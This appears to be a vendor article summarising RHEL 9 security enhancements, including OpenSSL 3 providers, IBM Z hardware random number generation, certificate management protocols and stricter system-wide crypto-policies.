RHEL 9 provides OpenSSL packages in upstream version 3.0.1, which includes many improvements and bug fixes over the previous versions. Some notable improvements include the following.

Providers are collections of algorithms, and you can choose different providers for different applications. This allows application developers to make security decisions about their applications without worrying too much about the security of underlying cryptographic algorithms. OpenSSL currently includes the following providers: **base, default, fips, legacy** and **null**. By default, OpenSSL loads and activates the **default** provider, which includes commonly used algorithms. Developers can programmatically invoke any providers based on application requirements.

The IBM Z-platform supports "CP Assist For Cryptographic Functions (CPACF)" which delivers high-speed on-chip cryptography. OpenSSL now supports this via NIST SP800-90A\-compliant AES-based deterministic random bit generator (DRBG). This allows applications running on IBM Z-platform to use this higher speed and more secure random number generator.

Finally, support has been added for better certificate management via Certificate Management Protocol (CMP, RFC 4210), the Certificate Request Message Format (CRMF), and HTTP transfer (RFC 6712). CMP messages are self-contained with protection independent of transfer mechanism, therefore they support end-to-end security.

Built-in RHEL utilities have been recompiled to utilize OpenSSL 3. This allows users to take advantage of new security ciphers for encrypting and protecting information.

**Improved system-wide crypto-policies**

In RHEL 9, the system-wide cryptographic policies have been adjusted to provide up-to-date security defaults:

*   Disabled TLS 1.0, TLS 1.1, DTLS 1.0, RC4, CAMELLIA, DSA, 3DES, and FFDHE-1024 in all policies. 
    
*   Increased minimum RSA key size and minimum Diffie-Hellman parameter size in LEGACY.
    
*   With the exception of Hash-based Message Authentication Codes (HMACs), SHA-1 is disabled in TLS and SSH algorithms.
    

If needed, customers can enable some of the disabled algorithms by using custom policies or sub policies.

Apart from the above, RHEL 9 includes protection against hardware-level security vulnerabilities like Spectre and Meltdown, and the operating system can also help user-space processes create memory areas inaccessible to malicious code. 

Additionally, RHEL 9 provides readiness for Payment Card Industry Data Security Standard (PCI DSS), the Health Insurance Portability and Accountability Act (HIPAA) and other customer security requirements. Its integrity measurement architecture (IMA) digital hashes and signatures create a new way for users to detect rogue infrastructure modifications.

Learn more about these and other security enhancements included in RHEL 9.

Tag

#mac